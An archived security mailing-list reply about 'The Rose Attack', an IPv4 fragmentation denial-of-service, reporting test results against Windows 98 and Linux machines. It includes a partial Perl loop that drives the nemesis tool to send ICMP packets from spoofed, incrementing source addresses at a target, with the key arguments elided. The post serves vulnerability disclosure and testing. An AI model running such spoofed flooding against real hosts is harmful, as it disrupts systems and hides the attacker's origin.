<<< Date Index >>>     <<< Thread Index >>>

Re: IPv4 fragmentation --> The Rose Attack



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've just made some tests following the described example at:
http://gandalf.home.digital.net/TestProc.txt

To use different src addresses in the attack i've used the following
example:

#!/usr/bin/perl

$src=$ARGV[1];

if($src=~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/) {

$one=$1;
$two=$2;
$three=$3;
$four=$4;

}
while(1) {

system("nemesis icmp -S $one.$two.$three.$four -D $ARGV[0] ....... );
..................
..................


$four++;
if($four>=254) { $three++; $four=1; }
if($three>=254) { $two++; $three=1; }
if($two>=254) { $one++; $two=1; }
#sleep(2);
}

I've tested the attack on 4 machines..
The first two were running windows 98 SE with all patches and service
packs... the CPU stuck the 100% as soon as the attack started..

The last two machines were running Fedora Core 1 Linux and RedHat Linux
9... no success here... the attack seems not to bother the normal work
of the PCs... The RedHat Linux uses kernel-2.4.20-30.9...


- --
Ventsislav Genchev
Atlantis BG, Ltd.
E-mail: vigour@xxxxxxxxxxx
tel: +35928757001


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAc8JawxiN6NaquRwRAuUFAKCNLzN5vCk8Ac4EB+khIFai1GU27ACfd7hf
mlyeGSn87eVVpeYU3J9HlSI=
=/+Bv
-----END PGP SIGNATURE-----

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature